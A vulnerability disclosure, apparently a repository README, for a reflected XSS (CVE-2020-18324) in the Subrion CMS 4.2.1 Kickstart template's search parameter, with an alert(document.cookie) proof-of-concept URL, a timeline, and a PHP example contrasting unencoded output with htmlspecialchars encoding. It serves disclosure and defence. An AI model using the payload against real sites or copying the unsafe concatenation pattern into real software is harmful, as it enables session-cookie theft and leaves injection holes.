hamm0nz/CVE-2020-18324

Subrion CMS 4.2.1 – Reflected XSS vulnerability in Kickstart template

Description

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites.

A reflected cross-site scripting (XSS) vulnerability was discovered in the "Kickstart" web application template of Subrion CMS v4.2.1, in the "search" component. It allows a remote attacker to inject arbitrary JavaScript.

Date: 22-02-2022
Software Link: https://subrion.org
Exploit Author: HaMM0nz
CVE: CVE-2020-18324
Category: Web Application

Proof of Concept

  1. Navigate to Subrion Kickstart template
  2. Inject <script>alert(document.cookie);</script> into the "q" parameter. In the PoC, the resulting URL is https://localhost/search/?q=<script>alert(document.cookie);</script>

Timeline

Discovery and report : 24 June 2019
CVE ID was assigned : 11 Aug 2021
Public : 22 February 2022

Solution

Consider complying with OWASP's XSS prevention guidelines (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).
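
The output encoding that the OWASP guidance calls for, shown next to the unencoded pattern that produces a reflected XSS like the one above. This is an added PHP example, not Subrion's code and not part of this repository; every function name in it is hypothetical.

```php
<?php
declare(strict_types=1);
// Added illustration, not Subrion source code. All function names are hypothetical.

// Read a query parameter as a string. A request such as ?q[]=x makes PHP
// deliver an array, which is treated here as an empty search term.
function query_param(array $get, string $name): string
{
    $value = $get[$name] ?? '';
    return is_string($value) ? $value : '';
}

// Encode for HTML element content and for quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: the parameter is concatenated into the page as-is,
// so any markup it carries is parsed by the browser.
function render_heading_unsafe(string $q): string
{
    return '<h1>Results for ' . $q . '</h1>';
}

// Hardened pattern: encode at the point of output, for the HTML context.
function render_heading(string $q): string
{
    return '<h1>Results for ' . e($q) . '</h1>';
}

// The search box reflects the same value inside an attribute: the attribute
// is quoted and the value is encoded, so quotes in the term cannot end it.
function render_search_box(string $q): string
{
    return '<input type="text" name="q" value="' . e($q) . '">';
}

// Constructed request data standing in for $_GET; the value is the PoC string above.
$get = ['q' => '<script>alert(document.cookie);</script>'];
$q = query_param($get, 'q');

echo render_heading_unsafe($q), PHP_EOL; // markup passes through unchanged
echo render_heading($q), PHP_EOL;        // markup is emitted as character references
echo render_search_box('O\'Reilly "books"'), PHP_EOL; // constructed benign term with quotes
```

The encoding has to be applied at every place the search term is written back into the response, since each reflection point is a separate sink.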

About

Exploit PoC for CVE-2020-18324